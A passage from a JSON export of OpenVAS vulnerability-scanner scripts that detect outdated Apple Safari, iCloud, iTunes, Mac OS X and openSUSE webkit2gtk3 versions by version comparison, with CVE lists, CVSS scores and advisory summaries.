prone to multiple remote code execution vulnerabilities.", "cvss3": {}, "published": "2017-12-28T00:00:00", "type": "openvas", "title": "Apple Safari Security Updates( HT208324 )", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7161", "CVE-2017-5753", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-7165", "CVE-2017-13870", "CVE-2017-5715", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-13884", "CVE-2017-7157", "CVE-2017-13885"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310812284", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812284", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Safari Security Updates( HT208324 )\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:safari\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812284\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2017-7156\", \"CVE-2017-7157\", \"CVE-2017-7160\", \"CVE-2017-13856\",\n \"CVE-2017-13866\", \"CVE-2017-13870\", \"CVE-2017-5753\", \"CVE-2017-5715\",\n \"CVE-2017-7161\", \"CVE-2017-13885\", \"CVE-2017-7165\", \"CVE-2017-13884\",\n \"CVE-2017-7153\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-12-28 14:26:04 +0530 (Thu, 28 Dec 2017)\");\n script_name(\"Apple Safari Security Updates( HT208324 )\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Safari\n and is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to multiple\n memory corruption issues, command injection issue in Web Inspector, redirect\n responses to '401 Unauthorized' and other multiple errors leading to 'speculative\n execution side-channel attacks' that affect many modern processors and\n operating systems including Intel, AMD, and ARM.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to execute arbitrary code or\n cause a denial of service or gain access to potentially sensitive information\n or spoof user interface.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari versions before 11.0.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari 11.0.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208324\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208403\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"macosx_safari_detect.nasl\");\n script_mandatory_keys(\"AppleSafari/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nsafVer = infos['version'];\npath = infos['location'];\n\n\nif(version_is_less(version:safVer, test_version:\"11.0.2\"))\n{\n report = report_fixed_ver(installed_version:safVer, fixed_version:\"11.0.2\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:04:22", "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-01-24T00:00:00", "type": "openvas", "title": "Apple iCloud Security Updates( HT208473 )", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4088", "CVE-2018-4096"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310812667", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812667", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iCloud Security Updates( HT208473 )\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812667\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2018-4088\", \"CVE-2018-4096\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-01-24 12:10:39 +0530 (Wed, 24 Jan 2018)\");\n script_name(\"Apple iCloud Security Updates( HT208473 )\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to multiple\n memory corruption issues addressed with improved memory handling.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to execute arbitrary code on the\n affected system.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 7.3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 7.3 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208473\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nicVer = infos['version'];\nicPath = infos['location'];\n\nif(version_is_less(version:icVer, test_version:\"7.3\"))\n{\n report = report_fixed_ver(installed_version:icVer, fixed_version:\"7.3\", install_path:icPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:04:19", "description": "This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-01-24T00:00:00", "type": "openvas", "title": "Apple iTunes Security Updates( HT208474 )", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4088", "CVE-2018-4096"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310812666", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812666", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iTunes Security Updates( HT208474 )\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:itunes\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812666\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2018-4088\", \"CVE-2018-4096\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-01-24 12:06:17 +0530 (Wed, 24 Jan 2018)\");\n script_name(\"Apple iTunes Security Updates( HT208474 )\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to multiple memory\n corruption issues.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to execute arbitrary code on the\n affected system.\");\n\n script_tag(name:\"affected\", value:\"Apple iTunes versions before 12.7.3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iTunes 12.7.3 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208474\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");\n script_mandatory_keys(\"iTunes/Win/Ver\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nituneVer = infos['version'];\nitunePath = infos['location'];\n\nif(version_is_less(version:ituneVer, test_version:\"12.7.3\"))\n{\n report = report_fixed_ver(installed_version:ituneVer, fixed_version:\"12.7.3\", install_path:itunePath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:37", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-01-24T00:00:00", "type": "openvas", "title": "Apple Mac OS X Multiple Vulnerabilities-01 (HT208465)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4092", "CVE-2018-4091", "CVE-2017-8817", "CVE-2018-4093", "CVE-2018-4088", "CVE-2018-4096", "CVE-2018-4089", "CVE-2018-4090"], "modified": "2019-04-29T00:00:00", "id": "OPENVAS:1361412562310812661", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812661", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Multiple Vulnerabilities-01 (HT208465)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812661\");\n script_version(\"2019-04-29T05:39:50+0000\");\n script_cve_id(\"CVE-2018-4096\", \"CVE-2018-4088\", \"CVE-2018-4089\", \"CVE-2018-4091\",\n \"CVE-2018-4093\", \"CVE-2018-4092\", \"CVE-2018-4090\", \"CVE-2017-8817\");\n script_bugtraq_id(102057);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-04-29 05:39:50 +0000 (Mon, 29 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-01-24 10:37:13 +0530 (Wed, 24 Jan 2018)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-01 (HT208465)\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An out-of-bounds read issue existed in the curl.\n\n - A memory initialization issue within kernel.\n\n - A race condition within kernel.\n\n - A validation issue within kernel.\n\n - A sandbox access issue.\n\n - Multiple memory corruption issues.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code on the affected system, bypass sandbox restrictions and\n read restricted memory.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X version 10.13.x prior to\n 10.13.3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X version\n 10.13.3 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208465\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.13\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName || \"Mac OS X\" >!< osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.13\")\n exit(0);\n\nif(version_in_range(version:osVer, test_version:\"10.13\", test_version2:\"10.13.2\")) {\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"10.13.3\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:39:17", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-26T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2018:3473-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4119", "CVE-2017-7161", "CVE-2018-4129", "CVE-2018-4165", "CVE-2018-4146", "CVE-2017-7165", "CVE-2018-4101", "CVE-2018-4128", "CVE-2018-4199", "CVE-2018-4163", "CVE-2018-12911", "CVE-2018-4120", "CVE-2018-4118", "CVE-2018-4114", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-11713", "CVE-2018-11712", "CVE-2018-4133", "CVE-2018-4162", "CVE-2017-7153", "CVE-2018-4125", "CVE-2017-7160", "CVE-2018-4233", "CVE-2018-4113", "CVE-2018-4222", "CVE-2017-13884", "CVE-2018-4127", "CVE-2018-4088", "CVE-2018-4204", "CVE-2018-4096", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4117", "CVE-2018-4161", "CVE-2017-13885", "CVE-2018-4232", "CVE-2018-4122", "CVE-2018-4200", "CVE-2018-4121"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852089", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852089", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852089\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-11646\", \"CVE-2018-11712\", \"CVE-2018-11713\", \"CVE-2018-12911\", \"CVE-2018-4088\", \"CVE-2018-4096\", \"CVE-2018-4101\", \"CVE-2018-4113\", \"CVE-2018-4114\", \"CVE-2018-4117\", \"CVE-2018-4118\", \"CVE-2018-4119\", \"CVE-2018-4120\", \"CVE-2018-4121\", \"CVE-2018-4122\", \"CVE-2018-4125\", \"CVE-2018-4127\", \"CVE-2018-4128\", \"CVE-2018-4129\", \"CVE-2018-4133\", \"CVE-2018-4146\", \"CVE-2018-4161\", \"CVE-2018-4162\", \"CVE-2018-4163\", \"CVE-2018-4165\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4200\", \"CVE-2018-4204\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-26 06:43:57 +0200 (Fri, 26 Oct 2018)\");\n script_name(\"openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2018:3473-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:3473-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-10/msg00071.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk3'\n package(s) announced via the openSUSE-SU-2018:3473-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for webkit2gtk3 to version 2.20.3 fixes the issues:\n\n The following security vulnerabilities were addressed:\n\n - CVE-2018-12911: Fixed an off-by-one error in xdg_mime_get_simple_globs\n (boo#1101999)\n\n - CVE-2017-13884: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2017-13885: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2017-7153: An unspecified issue allowed remote attackers to spoof\n user-interface information (about whether the entire content is derived\n from a valid TLS session) via a crafted web site that sends a 401\n Unauthorized redirect (bsc#1077535).\n\n - CVE-2017-7160: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2017-7161: An unspecified issue allowed remote attackers to execute\n arbitrary code via special characters that trigger command injection\n (bsc#1075775, bsc#1077535).\n\n - CVE-2017-7165: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2018-4088: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2018-4096: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n\n - CVE-2018-4200: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site that triggers a\n WebCore::jsElementScrollHeightGetter use-after-free (bsc#1092280).\n\n - CVE-2018-4204: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1092279).\n\n - CVE-2018-4101: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n\n - CVE-2018-4113: An issue in the JavaScriptCore function in the 'WebKi ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"webkit2gtk3 on openSUSE Leap 42.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18\", rpm:\"libjavascriptcoregtk-4_0-18~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37\", rpm:\"libwebkit2gtk-4_0-37~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-debuginfo~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-JavaScriptCore-4_0\", rpm:\"typelib-1_0-JavaScriptCore-4_0~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2-4_0\", rpm:\"typelib-1_0-WebKit2-4_0~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2WebExtension-4_0\", rpm:\"typelib-1_0-WebKit2WebExtension-4_0~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4\", rpm:\"webkit-jsc-4~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4-debuginfo\", rpm:\"webkit-jsc-4-debuginfo~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles\", rpm:\"webkit2gtk-4_0-injected-bundles~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles-debuginfo\", rpm:\"webkit2gtk-4_0-injected-bundles-debuginfo~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-debugsource\", rpm:\"webkit2gtk3-debugsource~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-devel\", rpm:\"webkit2gtk3-devel~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2\", rpm:\"webkit2gtk3-plugin-process-gtk2~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2-debuginfo\", rpm:\"webkit2gtk3-plugin-process-gtk2-debuginfo~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk3-lang\", rpm:\"libwebkit2gtk3-lang~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-32bit~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit\", rpm:\"libwebkit2gtk-4_0-37-32bit~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo-32bit\", rpm:\"libwebkit2gtk-4_0-37-debuginfo-32bit~2.20.3~11.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:39", "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-12-14T00:00:00", "type": "openvas", "title": "Apple iCloud Security Updates( HT208328 )", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13864", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-7157"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310812258", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812258", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iCloud Security Updates HT208328)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812258\");\n script_version(\"2019-05-17T13:14:58+0000\");\n script_cve_id(\"CVE-2017-13864\", \"CVE-2017-7156\", \"CVE-2017-7157\", \"CVE-2017-13856\",\n \"CVE-2017-13870\", \"CVE-2017-13866\", \"CVE-2017-7160\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 13:14:58 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-12-14 16:00:28 +0530 (Thu, 14 Dec 2017)\");\n script_name(\"Apple iCloud Security Updates( HT208328 )\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a 